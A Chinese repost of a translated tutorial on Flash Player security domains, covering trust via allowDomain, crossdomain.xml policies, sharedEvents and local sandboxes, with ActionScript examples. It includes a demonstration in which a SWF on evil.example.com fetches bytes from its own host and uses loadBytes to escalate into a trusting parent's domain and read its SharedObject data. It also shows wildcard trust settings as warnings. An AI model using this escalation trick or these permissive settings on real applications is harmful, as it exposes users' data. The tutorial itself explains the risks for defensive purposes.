`

转深入理解Flash的沙箱 – Security Domains

 
阅读更多

一篇很经典的进阶文章,国外牛人的分享,清晰明了,图文并茂,适合那些对Flash安全沙箱方面产生兴趣的朋友;已经有国人进行了辛苦的翻译,而且质量很高,所以特此转到这里作为日志留存,既方便自己随时温习,也希望能让其他更多喜欢AS开发的朋友能看到;

 
最后附上两篇文章的地址:
 
 
 
----------------------------------------------------- 此处为正文分割线 ----------------------------------------------------
 
Sandboxing 沙箱

沙箱是用于区分不同的数据和程序执行。沙箱对于安全性尤其重要。如果没有恰当的信任授权,两个位于不同沙箱内的内容应该没有任何交互。Flash Player的安全模型使用称为安全域的沙箱来分离内容。
虽然安全性是沙箱的主要用途,但这并不是唯一使用沙箱的原因。另外一种可能的情形是使用沙箱来避免命名冲突,这种区分代码的沙箱方式在Flash Player中被称为应用域

 

Security Domains 安全域

安 全域在Flash中是顶级的沙箱。安全域链接到内容的来源域名,或者是被加载的内容(如SWF文件)的来源域名。比如在senocular.com下的 SWF文件包含一个链接到senocular.com的安全域,而在example.com下的SWF文件则有一个链接到example.com的安全 域。不同的安全域使得SWF文件在Flash Player中播放时运行在自身的沙箱下。

                       Flash Player中的安全域沙箱

注意:在本教程的例子中,你将看到我用统一顶级域名下的不同子域来代表不同域名,这是因为在Flash中,不同子域和不同顶级域一样,都被视为不同的域。示例中代码也被简化过了,在Flash编辑环境下用时间线代码也可以进行测试。

不可执行的内容(非SWF文件),比如图片或者文本文件,也被划分到安全域中,同样与他们所处的域名相关联。实际上,正是域名决定了这些内容是否能够被某个SWF文件加载。更多这方面的内容将在不可执行文件的信任机制章节中进行讨论。

回到SWF上来,安全域划分了数据和可执行代码。如果两个SWF处于不同的安全域下,某个SWF中的数据(比如某个变量)是不可以被其他SWF获取的,当然,代码也不能执行。如果尝试获取其他域中SWF文件的数据将会产生一个安全错误。

下面的代码展示了一个SWF文件企图加载另外一个SWF,并获取其文档类的实例(也就是主时间线)。

http://same.example.com/parent.swf:

[code]

  1. var loader:Loader = new Loader();
  2. loader.contentLoaderInfo.addEventListener(Event.INIT, init);
  3.  
  4. var url:String = "http://diff.example.com/child.swf";
  5. loader.load(new URLRequest(url));
  6.  
  7. function init(event:Event):void {
  8. trace(loader.content);
  9. // SecurityError: Error #2121: Security sandbox violation:
  10. // Loader.content: http://same.example.com/parent.swf
  11. // cannot access http://diff.example.com/child.swf.
  12. // This may be worked around by calling Security.allowDomain.
  13. }

[/code]

任意想要获取被加载的SWF文件的内容的尝试,甚至包括trace Loader的content属性。都会引起安全错误,因为他们两者处于不同的安全域内。

安 全域的划分也适用于Flash Player所使用的原生ActionScript类。Flash Player在每个安全域中都创建了独立的原生类。举例来说,一个安全域内的XML类与另外一个安全域内的XML类是不相同的,改变其中一个XML的静态 属性XML.prettyIndent并不会影响到另一个安全域。

下面这个SWF文件加载了两个子SWF,一个来自自身的域,另一个从另外的域加载。我们改变了主文件的prettyIndent属性,来看看这两个子文件的属性输出。

http://same.example.com/parent.swf:

  1. trace(XML.prettyIndent); // 2
  2. XML.prettyIndent = 5;
  3. trace(XML.prettyIndent); // 5
  4.  
  5. // Same domain:
  6. var sameLoader:Loader = new Loader();
  7. var sameURL:String = "http://same.example.com/child.swf";
  8. sameLoader.load(new URLRequest(sameURL));
  9.  
  10. // Different domain:
  11. var diffLoader:Loader = new Loader();
  12. var diffURL:String = "http://diff.example.com/child.swf";
  13. diffLoader.load(new URLRequest(diffURL));

http://same.example.com/child.swf:

  1. trace("same: " + XML.prettyIndent); // same: 5

http://diff.example.com/child.swf:

  1. trace("diff: " + XML.prettyIndent); // diff: 2

可以看到,第二个子文件的属性并没有被改变。这就说明不同的安全域具有不同的原生ActionScript类定义。

Trust 信任授权

尽管安全域只允许相同域下的通讯,但是我们可以通过信任授权来让处于两个不同安全域内的SWF文件进行通讯。通过授权,某个安全域内的文件可以获取另一个域内文件的的数据,或者调用其方法,就像是处于相同的安全域下一样。

在ActionScript中,SWF的信任授权是通过Security.allowDomain(或者类似的Security.allowInsecureDomain)来设置的。在被信任的安全域内的代码可以调用这个方法来授权信任给另一个或者一组在其他安全域内的SWF文件。这种信任是单向的,发起allowDomain的SWF文件不能去访问被授权信任的文件,除非对方也做了信任授权。

                          建立信任关系的安全域

在下面的例子中,一个子SWF文件调用allowDomain来允许父SWF的访问:

http://home.example.com/parent.swf:

  1. var loader:Loader = new Loader();
  2. loader.contentLoaderInfo.addEventListener(Event.INIT, init);
  3.  
  4. var url:String = "http://away.example.com/child.swf";
  5. loader.load(new URLRequest(url));
  6.  
  7. function init(event:Event):void {
  8. // (子文件执行了allowDomain)
  9. trace(loader.content); <em>// [object DocumentClass]
  10. }

http://away.example.com/child.swf:

  1. Security.allowDomain("home.example.com");

如 果没有授信,就像前文说到的,还是会引发安全错误。但是一旦被加载的子SWF调用了allowDomain以后,父SWF文件就可以自由的访问子SWF文 件中的内容。要注意的是在这个例子中,由于父SWF文件没有授权away.example.com的信任,所以子SWF仍然无法访问loader的 content属性。

信任是非常重要的安全概念,绝对不能掉以轻心。我们经常看见使用通配符的授权:

  1. // 小心哦!
  2. Security.allowDomain("*");

这 么做将允许所有SWF文件,不仅仅只是你加载的或是加载你的,可以通过ActionScript来访问你文件中的数据。就算你没有在文件中包含敏感数据, 但是如果你在文件中提供了某些方法去获取这种数据,那也有可能被其他SWF调用。使用allowDomain来授权的信任就像给了其他SWF文件相等的权 利:你能做什么,我就能做什么。在接下来的合并安全域章节中你将看到这意味着什么。

如果你只是想让SWF之间能够通信,除了信任授权的方法以外我们还可以使用sharedEvents对象来实现,我们将在在非受信的SWF之间通讯章节中讨论。

Non-executable Trust 不可执行文件的信任机制

由于不可执行文件(也就是非SWF文件)不能调用allowDomain代码,所以这类文件的信任机制在Flash Player中有不一样的处理方法。这就是跨域(cross-domain)策略文件派上用场的地方。

跨域策略文件是一个放在网站的根域名下的命名为crossdomain.xml的XML文件。和allowDomain类似,定义了一组可以被Flash Player加载的安全网站域名。一个简单的跨域策略文件的例子如下:

http://example.com/crossdomain.xml:

<?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain-policies="by-content-type"/> <allow-access-from domain="*.example.com"/> <allow-access-from domain="www.example-partner.com"/> </cross-domain-policy>

你可以从Cross-domain policy file specification (adobe.com)获得详细的文件格式信息。

和allowDomain不同的是,跨域策略文件只提供了包含所有文件(通常是一个域下的所有文件)的用法。上面的例子表示允许来自example.com的任意子域或www.example-partner.com的SWF文件加载example.com下的文件。

由于存在allowDomain机制,跨域策略文件通常不用于授权SWF文件的访问。跨域加载SWF的时候不会请求跨域策略文件。只有当要把一个跨域的SWF合并到当前的安全域的时候,才需要提供跨域策略文件。这个主题将在合并安全域中进行讨论。

不管是标准的位于域名根目录下的跨域策略文件还是用Security.loadPolicyfile指定的跨域策略文件,都只有在需要的时候才会被加载:当内容被加载的同时,跨域策略文件也被一起加载进来。

加载完成后,Flash Player分析跨越策略文件并判断该域是否为信任SWF所处的域。如果答案是肯定的话,文件正常加载,就像处于和SWF文件相同的域一样。反之则有可能有两种情况:

  • 文件不被加载
  • 文件加载成功,但是其数据不能被SWF文件直接访问

如果文件本身就是数据(文本文件,XML文件,二进制数据等等),那么文件就不会被加载。

                        需要跨域策略文件来加载仅包含数据的文件

如 果文件除了数据以外还有其余用途(图像文件,声音文件等),那么文件还是能够被加载到用户可见(可听)的环境中。比如说图像文件,就算没有跨域策略文件, 还是可以在Loader对象中显示给用户看。但是类似BitmapData.draw等直接访问图像数据的方法就不能运行。

       需要跨域策略文件来获取其他文件的数据的引用

对此可能大家都有点疑惑。实际上用户是可以访问这些数据的,但是SWF文件不行。Flash Player是在保护用户的数据不被潜藏有危险代码的SWF文件获取。用户不需要关心跨域策略文件也能正常的浏览网页内容。

但这并不是说跨域策略文件可以被忽视,类似于下面这种过分纵容的跨域策略文件有很多潜在的危险:

<?xml version="1.0"?> <cross-domain-policy> <!-- 小心哦! --> <allow-access-from domain="*"/> </cross-domain-policy>

警告:使用通配符(*)允许所有域的访问等同于:用户可能可以接触到的所有处于该域下的数据都有可能被任意SWF文件获取

客 户端的Flash Player运行在当前用户的认证下,这就表示用户的数据可能就是Flash Player的数据。而且Flash Player的数据可能被任意在里面运行的SWF获取。Flash Player默认只允许相同域名下的SWF的安全数据,并限制跨域SWF的运行。如果没有这层限制,SWF可以获取任意当前用户可以获取的数据。

举 个例子:某用户使用他的认证来登录网页的邮件客户端收取邮件,然后用户打开了一个包含有恶意程序的SWF的页面。如果没有跨域限制的话,这个SWF可以用 他现有的认证偷偷地加载用户的邮件页面。用户可以访问的内网也不例外,只要用户能去的地方,SWF就能去。幸好Flash Player阻止了这种获取数据的行为,除非该域通过跨域策略文件给予SWF授权。

记住一个原则,永远不要对包含敏感数据的域开发跨域授权,即使需要上面的信息来进行用户认证。把SWF可以访问的数据划分到不同的域或者子域下面。

这将使得敏感数据不可被访问,但是仍然可以对其他域下的SWF文件公开你的其他数据。

Non-executable Content Without Trust 非受信的不可执行文件

如果没有跨域策略文件的信任授权,Flash Player禁止非SWF文件的获取。特别是像文本那样的仅包含数据的文件,甚至不会加载。如果你需要从一个没有跨域授权的域中获取数据,还是有一个变通的办法。

跨域策略文件用于保护数据,特别是保护用户数据,或者说是用户能够接触到的数据。因为Flash Player是运行在客户端的,但是服务器端的代码没有这种限制。服务器完全是另外一台机器,所以用户请求和服务器请求是完全无关的。

由于服务器没有用户的限制,服务器端的代码可以从任意公开的网络服务获取数据。也就是说包含SWF的服务器可以用于访问外部域的数据,然后作为相同域的数据返回给Flash Player。由于处在相同的域下,Flash Player就不需要有跨域策略文件了。

下面的代码演示了一个服务器端的php脚本加载外部数据的例子:

http://home.example.com/loader.swf:

  1. var urlLoader:URLLoader = new URLLoader();
  2.  
  3. var urlVariables:URLVariables = new URLVariables();
  4. // 服务器端获取外部数据的地址
  5. urlVariables.externalURL = "http://away.example.com/content.txt";
  6.  
  7. // 服务器端的脚本获取外部数据并传给SWF
  8. var serverPage:String = "http://home.example.com/read.php";
  9.  
  10. var request:URLRequest = new URLRequest(serverPage);
  11. request.data = urlVariables;
  12. urlLoader.load(request);

这种解决方案也有一定的问题。首先你必须能够在服务器端部署代码,某些小项目也许根本不需要服务器环境。

另一个可能更重要的原因是这种方式加倍了网络流量。首先必须从外部域加载到你自己的域下,然后才被下载到你的SWF客户端。同时这也加重了你的服务器的负载。使用跨域策略文件的话就不会有这种问题。

这可以作为一种解决方案,但最好还是能用跨域策略文件来解决。

SWF Communication Without Trust 在非受信的SWF之间通讯

在 某些情况下有可能要与其他来源不那么可靠的域中的SWF通讯,你并不希望完全信任该域,放开全部授权。对此LoaderInfo对象的 sharedEvents属性提供了另一种机制。sharedEvents对象是唯一的一个可以在不同安全域中发送共享事件的对象。加载者和被加载者都可 以通过这个对象来向对方发送事件。

通过sharedEvents对象发送的事件在两个域中都是完全受信的,这就使得在两个安全域中传递的任意数据都无需考虑安全问题。

警告:当心!通过sharedEvents对象传递了错误的数据仍然有可能把你的SWF中的数据暴露出去。比如你的事件包含了一个复杂对象,特别是显示列表上的对象,那么你的整个SWF都将暴露。

所以通过sharedEvents发送的事件应该限制为包含简单数据的事件类型,避免一些被包含后门的SWF程序加以利用。如果你要传递复杂的事件,那要在传递之前先做一下清理。

使用sharedEvents进行通讯的两个SWF需要确保发送和接收的是一致的事件类型。父SWF可以发出一种事件并监听另一种。子SWF可以监听父SWF发出的事件并发出父SWF中正在监听的事件。这些事件的名字可以是随意的。

下面的例子演示了在不同安全域中的父子SWF使用sharedEvents来通讯简单的文本信息的情况。父SWF发出“fromParent”事件,而子SWF发出“fromChild”事件。

http://safe.example.com/parent.swf:

  1. var loader:Loader = new Loader();
  2. var shared:EventDispatcher = loader.contentLoaderInfo.sharedEvents;
  3. shared.addEventListener("fromChild", fromChild);
  4.  
  5. var url:String = "http://untrusted.example.com/child.swf";
  6. loader.load(new URLRequest(url));
  7.  
  8. function fromChild(event:TextEvent):void {
  9. trace(event.text); // Good day
  10.  
  11. var replyMessage:TextEvent = new TextEvent("fromParent");
  12. replyMessage.text = "Same to you";
  13. shared.dispatchEvent(replyMessage);
  14. }

http://untrusted.example.com/child.swf:

  1. var shared:EventDispatcher = loaderInfo.sharedEvents;
  2. shared.addEventListener("fromParent", fromParent);
  3.  
  4. var firstMessage:TextEvent = new TextEvent("fromChild");
  5. firstMessage.text = "Good Day";
  6. shared.dispatchEvent(firstMessage);
  7.  
  8. function fromParent(event:TextEvent):void {
  9. trace(event.text); // Same to you
  10. }

任意的事件类都可以像这样用于传递信息,也包括自定义事件。再次强调,要当心不要把包含引用的数据(特别是显示列表上的对象)随着事件一起发送出去。这种情况的例子在场景的拥有者和获取权限章节中可以找到。

Merging Security Domains 合并安全域

如果两个域之间建立了信任关系,一个SWF就能把另外一个SWF加到自己的安全域内,就像是在相同的域下一样。

在这种情况下信任授权的处理有少许不同。首先,包含父SWF的域不需要指定什么,只要执行加载另一个SWF到当前的安全域就表示完全信任这个SWF。

其 次,因为子SWF是立即被加载到父SWF的安全域中,并没有机会通过allowDomain进行信任授权声明。当子SWF可以执行allowDomain 声明的时候,已经被加载并实例化到另外的域中。所以这种情况下,跨域策略文件将派上用场。实际上这也是跨域策略文件唯一适用于对SWF进行授权的情况。

   需要跨域策略文件把跨域的SWF加载到相同的安全域

要加载某个SWF到自己的安全域内,需要给Loader.load方法指定一个LoaderContext对象。LoaderContext对象的securityDomain属性设置为当前的安全域(SecurityDomain.currentDomain)。通过这样的加载方式,父SWF授信给子SWF,而子SWF的授信则需要通过跨域策略文件。

http://host.example.com/parent.swf:

  1. trace(new LocalConnection().domain); // host.example.com
  2.  
  3. var loader:Loader = new Loader();
  4.  
  5. // 创建一个LoaderContext对象把子SWF加载到当前的安全域
  6. var context:LoaderContext = new LoaderContext(true);
  7. context.securityDomain = SecurityDomain.currentDomain;
  8.  
  9. var url:String = "http://trusting.example.com/child.swf";
  10. loader.load(new URLRequest(url), context);

http://trusting.example.com/crossdomain.xml:

<?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="host.example.com"/> </cross-domain-policy>

http://trusting.example.com/child.swf:

  1. trace(new LocalConnection().domain); // host.example.com

我们可以通过LocalConnection对象的domain属性来检查每个SWF所处的安全域。虽然子SWF原先所处的域是trusting.example.com,但是由于它被加载到父SWF所处的域中,所以子SWF最终所处的安全域是host.example.com。

用这个方式加载的SWF文件权力比用allowDomain授权的更加大。使用allowDomain授权,等同于说你能做什么,我就能做什么。而把SWF加载到同一个安全域,则等同于我能做任何事。在前一种情况下,子SWF只能调用父SWF下的代码,还是受限于父SWF中的定义。但是通过加载到相同的安全域,这些子SWF就可以在你的域下面做任意操作,这包括:

  • 获取父SWF中的任意引用
  • 读取主域中的所有文件
  • 读取其他授信给主域的所有域下的文件
  • 读取主域下的共享对象
  • 获取通过主域建立的共享连接通讯
  • 获取授信给主域的socket连接

所以在引入跨域SWF文件到你当前的安全域下的时候,你要确保这种权力不会被滥用。

使用包含安全域的LoaderContext对象的load方法不是能够引入跨域SWF到你的安全域的唯一方法。Loader类的另一个方法loadBytes也可以做到。和load不同的是,它不是用URL来加载外部内容,而是直接加载以ByteArray的形式加载对象。

由于ByteArray与域名之间没有关联,所以用loadBytes方法加载的对象将直接进入当前安全域内。因为你在加载包含这些字节对象之前往往都要经过某种信任授权,所以这通常是安全的。

http://host.example.com/parent.swf:

  1. trace(new LocalConnection().domain); // host.example.com
  2.  
  3. var loader:Loader = new Loader();
  4.  
  5. var urlLoader:URLLoader = new URLLoader();
  6. urlLoader.dataFormat = URLLoaderDataFormat.BINARY;
  7. urlLoader.addEventListener(Event.COMPLETE, bytesLoaded);
  8.  
  9. // cross-domain policy file required to load data
  10. var url:String = "http://trusting.example.com/childbytes.swf";
  11. urlLoader.load(new URLRequest(url));
  12.  
  13. function bytesLoaded(event:Event):void {
  14. loader.loadBytes(urlLoader.data);
  15. }

http://trusting.example.com/crossdomain.xml:

<?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="host.example.com"/> </cross-domain-policy>

http://trusting.example.com/childbytes.swf:

  1. trace(new LocalConnection().domain); // host.example.com

就和前面看到的例子一样,通过检查子SWF文件的LocalConnection.domain属性,使用loadBytes方法加载的子SWF也显示为相同的安全域。

警告:loadBytes方法有个小小的安全问题:可以把授信过的跨域SWF和加载到当前安全域下的SWF两者间的不同扯平。我们知道虽然这两者都是被信任的,但是就像上面的列表中提到的,后者比前者的权力更大。“你能做什么,我就能做什么”与“我能做任何事”之间的差别,结果可以变成没有差别。

这是因为授信过的跨域SWF文件可以访问父SWF的任何对象,包括父SWF对象的Loader实例,一旦拥有了对loadBytes方法的引用,这就意味着可以把某些字节对象加载到当前的安全域。

下面的这个例子展示了这种可能性:

http://good.example.com/parent.swf:

  1. // 授权 "你能做什么,我就能做什么"
  2. Security.allowDomain("evil.example.com");
  3.  
  4. // 应当受保护的数据
  5. var so:SharedObject = SharedObject.getLocal("foo", "/");
  6. so.data.foo = "bar";
  7. so.flush();
  8.  
  9. var loader:Loader = new Loader();
  10. var url:String = "http://evil.example.com/child.swf";
  11. loader.load(new URLRequest(url));

http://evil.example.com/child.swf:

  1. var so:SharedObject = SharedObject.getLocal("foo", "/");
  2. trace("trust only: " + so.data.foo); // trust only: undefined
  3.  
  4. var urlLoader:URLLoader = new URLLoader();
  5. urlLoader.dataFormat = URLLoaderDataFormat.BINARY;
  6. urlLoader.addEventListener(Event.COMPLETE, bytesLoaded);
  7.  
  8. var url:String = "http://evil.example.com/childbytes.swf";
  9. urlLoader.load(new URLRequest(url));
  10.  
  11. function bytesLoadedEvent):void {
  12. // 威胁!loadBytes加载了SWF数据到父SWF的安全域
  13. loaderInfo.loader.loadBytes(urlLoader.data);
  14. }

http://evil.example.com/childbytes.swf:

  1. var so:SharedObject = SharedObject.getLocal("foo", "/");
  2. trace("same domain: " + so.data.foo); // same domain: ba

将来版本的Flash Player可能会改变这种行为,所以在程序中不要使用这种方法。我们应该关注的是加载授信过的SWF文件会带来的潜在威胁:暴露你的域下的所有数据。

Stage Owner and Access 场景的拥有者和获取权限

当第一个SWF文件被加载到Flash Player中的时候,它被加到显示列表的根上,也就是我们所说的stage对象。这也是Flash Player自己的显示对象的根。每个SWF都有代表自己主文档类或者主时间线的根(叫做root)。第一个被创建的SWF实例的根被放置于场景上,其他子SWF使用Loader对象的实例来加载。

场景的特别之处在于它本身就位于显示列表上,所有处于显示列表上的子SWF都可以取得它的引用,但是它只有一个拥有者:就是第一个被实例化的那个SWF。场景的拥有者决定了场景所连接的安全域。其他的SWF想对场景进行特殊操作的行为都必须获得场景所有者的信任授权。

你可能有注意到在过去的有些程序或者是组件中,被加载到不同的域(未授信)里的时候报错。这正是因为没有取得对场景对象进行操作的授权。因为场景对象是可以被引用的,但是诸如场景的addEventListener方法等却不可用,所以这很容易引起误解。

在下面的例子中看看场景是如何可以被子SWF访问,但是却不能调用stage.addEventListener方法。

http://first.example.com/parent.swf:

  1. var loader:Loader = new Loader();
  2. addChild(loader);
  3.  
  4. var url:String = "http://<samp>second.example.com/child.swf";
  5. loader.load(new URLRequest(url));

http://second.example.com/child.swf:

  1. // Works
  2. trace(stage); // [object Stage]
  3.  
  4. // Does not work
  5. stage.addEventListener(MouseEvent.CLICK, stageClick);
  6. // SecurityError: Error #2070: Security sandbox violation:
  7. // caller http://second.example.com/child.swf cannot access
  8. // Stage owned by http://first.example.com/parent.swf.

场 景的这种所有者关系非常操蛋,因为我们经常需要对场景对象监听鼠标或者键盘事件,比如检测键盘按下或者检测鼠标在物体外部释放点击。在这种情况下,单靠子 SWF自身是没办法完成的。还好,场景拥有者的父SWF可以通过sharedEvents传递场景事件而不必授信给子SWF。通过这种方式,可以在保护主 域的前提下配合完成这种工作。

警告: 以下这个使用范例演示了sharedEvents是如何处理安全性问题的。一些鼠标事件的relatedObject属性持有对时间线上的对象的引用。如 果不经过清理,这些对象就会暴露给没有经过授信的域。所以通过sharedEvents发送事件时,要把这些引用清除。比如MouseEvent,我们可 以新建一个仅包含必须数据的MouseEvent对象。

下面的示例展示了如何通过sahredEvents发送场景事件。示例中仅仅转发了MOUSE_OUT事件,当然也可以扩展于其他的事件类型。注意如何创建一个代理事件并保护父SWF中的对象。

http://stageowner.example.com/parent.swf:

  1. var combination:String = "1-2-3-4-5"; // 隐私数据
  2.  
  3. var loader:Loader = new Loader();
  4. var shared:EventDispatcher = loader.contentLoaderInfo.sharedEvents;
  5.  
  6. var url:String = "http://untrusted.example.com/child.swf";
  7. loader.load(new URLRequest(url));
  8.  
  9. stage.addEventListener(MouseEvent.MOUSE_OUT, forwardMouseEvent);
  10.  
  11. function forwardMouseEvent(event:MouseEvent):void {
  12. // 威胁!这种做法暴露了relatedObject,也使得其他数据被暴露
  13. //shared.dispatchEvent(event);
  14.  
  15. // Safer: 创建一个清理过的代理事件来切断relatedObject的引用
  16. var safeEvent:MouseEvent = new MouseEvent(event.type);
  17. safeEvent.altKey = event.altKey;
  18. safeEvent.buttonDown = event.buttonDown;
  19. safeEvent.ctrlKey = event.ctrlKey;
  20. safeEvent.delta = event.delta;
  21. safeEvent.localX = event.localX;
  22. safeEvent.localY = event.localY;
  23. safeEvent.shiftKey = event.shiftKey;
  24.  
  25. shared.dispatchEvent(safeEvent);
  26. }

http://untrusted.example.com/child.swf:

  1. var shared:EventDispatcher;
  2.  
  3. // 如果场景事件不能引用,那就通过sharedEvents监听
  4. if (loaderInfo.parentAllowsChild){
  5. stage.addEventListener(MouseEvent.MOUSE_OUT, stageMouseOut);
  6. }else{
  7. shared = loaderInfo.sharedEvents;
  8. shared.addEventListener(MouseEvent.MOUSE_OUT, stageMouseOut);
  9. }
  10.  
  11. function stageMouseOut(event:MouseEvent):void {
  12. // -- stage mouse out actions here --
  13.  
  14. // 如果sharedEvents传递了原始的鼠标事件,那么父域中的数据就暴露了!
  15. //trace(Object(event.relatedObject).root.combination); // 1-2-3-4-5
  16. }

幸好有safeEvent这个MouseEvent的实例,原本的MouseEvent对象的relatedObject指向的引用被屏蔽了。实际上,所有通过sharedEvents对象发送的事件都应该用这种方式清理一遍。

Local Security Domains 本地安全域

在 硬盘上运行的SWF文件同样有自己的安全域。本地安全域有自己独特的行为,共分为4种安全沙箱类型:local-with-file, local-with-network, local-trusted, and application for AIR(本文不详细讨论AIR)。再加上网络上的SWF,一共有5种安全沙箱。在ActionScript中,你可以用Security.sandboxType来获得当前的安全沙箱类型。

  • local-with-file (Security.LOCAL_WITH_FILE)—本地不受信任的文件,只可以访问本地数据,不能与网络通信。
  • local-with-network (Security.LOCAL_WITH_NETWORK)—本地不受信任的文件,只可以访问网络,但是不能读取本地数据。
  • local-trusted (Security.LOCAL_TRUSTED)—本地受信的文件,通过Flash Player设置管理器或者FlashPlayerTrust文件授权。可以访问本地和网络。
  • application (Security.APPLICATION)—随着AIR包而安装,运行在AIR程序中。默认在这种沙箱类型下的文件可以调用任意域下的文件(外部域可能不允许)。而且默认能从任意其他域下加载数据。
  • remote (Security.REMOTE)—来自网络的文件,遵循安全域的沙箱规则。

由 于有可能从用户的硬盘上获取敏感数据,所以本地文件在安全方面有着严格的规则。一旦有机会,恶意的SWF将可以从电脑上读取数据并上传到网络上的服务器。 所以为了防止这种情况,本地的SWF只允许一种类型的通讯,要么就是本地,要么就是网络。而且,不同安全沙箱类型的SWF不能相互加载,避免能同时访问网 络和访问本地的情况出现。

由 于我们不能判断本地文件的域名,所以判断本地SWF文件的安全沙箱用的是另外一种形式。只允许本地和只允许网络这两种情况是通过SWF文件内的标识来区分 的,所有的SWF在发布的时候都带有这种标识,当SWF在本地运行的时候,Flash Player就用它来检测安全沙箱类型。

对于本地的信任文件,相同的问题是我们没有地方来保存跨域策略文件,所以我们通过Flash Player的设置管理器里的全局安全设置面板来设置。通过下图中所示的下拉菜单把本地SWF的路径添加到本地的安全文件列表里。

                                  Flash Player 设置管理器

另 一种方式是通过配置文件的方式。配置文件不像设置管理器那样需要联网来使用。要把SWF或者包含SWF的文件夹添加到信任位置的话只需要添加路径到 Flash Player的#Security\FlashPlayerTrust下的.cfg文件就可以了。在Mac和Windows上,这个路径如下:

  • Windows 95-XP:
    C:\Documents and Settings\[username]\Application Data\Macromedia\Flash Player\#Security\FlashPlayerTrust
  • Windows Vista-7:
    C:\Users\[username]\AppData\Roaming\Macromedia\Flash Player\#Security\FlashPlayerTrust
  • Mac OS X:
    /Users/[username]/Library/Preferences/Macromedia/Flash Player/#Security/FlashPlayerTrust

[username] 替换为你的用户名。

两 种方法都是把信任授权信息写入你的硬盘(全局安全设置面板也一样,保存在Flash Player的特定目录下)。这些文件就像你本地的跨域策略文件一样。当Flash Player读取的时候,信任授权给SWF,并覆盖SWF文件中关于本地访问权限的标识,从而允许受信的SWF能够同时访问本地和网络。

关于本地信任机制还有一点需要注意的是即使是本地受信的文件,仍然不能把处于外部沙箱的内容加载入本地沙箱。

大 多数Flash内容都是为网络创建的,所以通常不需要完全理解本地的安全沙箱机制。但是开发和测试是一个例外。Flash编辑器在测试的时候就是把SWF 放在一个本地受信的安全沙箱里面。这有可能会造成与真正发布的SWF情况不同的结果,因为两者的安全沙箱不同。比如你测试的时候可以从没有授信的外部域读 取内容,而真正发布到网站上的SWF却无法加载。所以当你测试的时候要注意,你所看到的结果和最终发布的版本有可能不一样。

分享到:
评论

相关推荐

    flash安全沙箱汇总

    在IT行业中,安全沙箱是一种重要的安全机制,尤其在Flash技术中扮演着核心角色。Flash安全沙箱的主要目的是为了限制并隔离运行的Flash内容,防止它们对...了解这些安全概念对于理解和评估网络内容的安全性至关重要。

    java ,c#,delphi 解决flash安全沙箱问题

    首先,让我们深入了解一下 Flash 的安全沙箱模型。Flash 分为三个主要的安全沙箱:浏览器沙箱、本地-with-网络沙箱和本地-without-网络沙箱。浏览器沙箱是最严格的,只允许 Flash 内容与同一域名的资源交互;本地-...

    深入理解ApplicationDomain和SecurityDomain

    ### 深入理解ApplicationDomain和SecurityDomain #### 安全域(Security Domain)与应用程序域(Application Domain)概述 安全域与应用程序域是Flash Player中两种重要的沙箱概念,它们帮助开发者理解如何管理和...

    flash 安全沙箱处理集合

    在不同沙箱之间进行通信需要特殊处理,例如通过`flash.system.Security`类的`allowDomain()`或`allowInsecureDomain()`方法设置安全策略。 6. **处理问题的策略** 遇到安全沙箱问题时,首先需要确定代码运行的...

    Flash加载swf文件的沙箱问题

    本篇文章将详细探讨“Flash加载SWF文件的沙箱问题”,并结合标签“源码”和“工具”来深入理解这个问题。 Flash Player为了确保用户的安全,采用了沙箱模型,这个模型将不同的运行环境分隔开来,防止恶意代码对用户...

    火狐浏览器崩溃怎么办,Flash沙箱安全模式帮你轻松解决.docx

    首先,我们需要了解Flash沙箱安全模式。沙箱是一种安全机制,它将Flash内容限制在一个受控的环境中运行,以防止恶意代码对操作系统造成破坏。启用Flash沙箱安全模式可以降低因Flash插件引起的安全风险和稳定性问题。...

    Flash Socket安全沙箱策略mini服务器,解决Flash Socket安全沙箱,安全策略

    本程序为绿色mini服务程序 程序会自动打开Flash默认的843端 自动将crossdomain.xml返回给flash客户端 您可以修改crossdomain.xml中的内容,大小不要超过10K 有问题可email我

    沙箱原理介绍,沙箱的分类

    系统级沙箱则更深入,模拟整个操作系统环境,如Windows XP/Windows 7/Linux,它能监测到更广泛的API调用,提供更全面的行为分析,适用于检测各种文件格式,包括可执行文件、文档、网页、图片、压缩文件等。...

    全面认识Flex安全沙箱

    在理解Flex安全沙箱时,还需要考虑FlashPlayer的权限控制,它由四个层次组成: - **管理用户控制**:系统管理员可以通过mms.cfg文件和全局FlashPlayer信任目录来设定全局安全策略。 - **用户控制**:普通用户可以...

    Flash Socket策略mini服务器,迅速解决Flash socket安全策略问题,安全沙箱问题

    本程序为绿色mini服务程序 程序会自动打开Flash默认的843端口 自动将crossdomain.xml返回给flash客户端 您可以修改crossdomain.xml中的内容,大小不要超过10K

    在Flex中发布地图 程序报错 SecurityError: Error #2048: 安全沙箱冲突,只需要下载添加这个就可以

    网上的方法很多,我看了好多,但是就是不管用,我的情况是,在程序没发布时,直接运行没错误,但是当发布时,访问就错了,提示SecurityError: Error #2048: 安全沙箱冲突:http://localhost:8086/index.swf 不能从 ...

    SpringBoot+Vue支付宝沙箱支付

    在IT行业中,集成支付宝支付功能是一项常见...通过学习和实践这个项目,你不仅可以掌握SpringBoot和Vue的集成应用,还能深入了解支付宝支付接口的使用以及沙箱环境的调试方法,对于提升你的支付系统开发能力大有裨益。

    华为Firehunter6300沙箱技术白皮书

    华为沙箱技术

    支付宝当面付沙箱环境调试

    总之,调试支付宝当面付沙箱环境涉及到多个环节,从模拟器的环境配置到代码级别的调试,都需要细心操作和深入理解支付流程。在解决问题的过程中,开发者应充分利用支付宝开放平台提供的文档和开发者工具,以提高调试...

    源于FLEX中的安全沙箱问题

    【标题】:“源于FLEX中的安全沙箱问题” 【描述】:在FLASH PLAYER中,安全沙箱是一个关键的安全性组件,它将资源逻辑地分组,以限制各个FLASH应用...了解并正确使用这些安全机制对于开发安全的Flash应用至关重要。

    as3 安全沙箱 处理办法

    1. **本地沙箱**:当Flash内容从用户的本地硬盘加载时,它们运行在本地沙箱中,不能访问网络资源,但可以访问本地文件系统和硬件。 2. **网络沙箱**:如果内容从网络上加载,如通过HTTP或FTP,它们将运行在网络沙箱...

    FLEX安全沙箱实用指南

    在进行FLEX开发时,了解和掌握FLEX的安全沙箱机制对于确保应用程序的安全性至关重要。本文将详细介绍FLEX安全沙箱的相关概念及其应用场景,帮助开发者更好地理解如何在实际开发过程中运用这些知识。 #### 二、FLEX...

    金山沙箱独立版

